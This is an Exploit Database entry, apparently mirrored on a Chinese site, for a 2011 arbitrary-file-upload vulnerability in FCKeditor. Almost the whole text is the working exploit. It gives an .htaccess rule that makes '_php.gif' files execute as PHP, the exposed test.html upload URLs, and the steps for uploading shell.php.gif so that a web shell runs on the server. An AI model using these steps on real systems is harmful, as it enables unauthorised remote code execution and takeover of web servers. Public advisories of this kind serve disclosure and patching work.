FCKEditor Core – ‘FileManager test.html’ Arbitrary File Upload (2)

• Exploit Database
• 10 阅读

• 作者： pentesters.ir
  日期： 2011-08-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17644/

• In The Name Of GOD 
  [+] Title:FCKeditor all version Arbitrary File Upload Vulnerability
  [+] Date: 2011
  [+] script:http://sourceforge.net/projects/fckeditor/
  [+] Author: pentesters.ir
  [+] Website : WwW.PenTesters.IR
  ---------------------------------------------------------
  1.create a htaccess file:
  code: 
  <FilesMatch "_php.gif">
  SetHandler application/x-httpd-php
  </FilesMatch>
  
  2.Now upload this htaccess with FCKeditor.
  http://target.com/FCKeditor/editor/filemanager/upload/test.html
  http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
  ----------------------------------------------------------------------------------------------
  3.Now upload shell.php.gif with FCKeditor.
  4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
  5.http://target.com/anything/shell_php.gif
  6.Now shell is available from server.
  ---------------------------------------------------------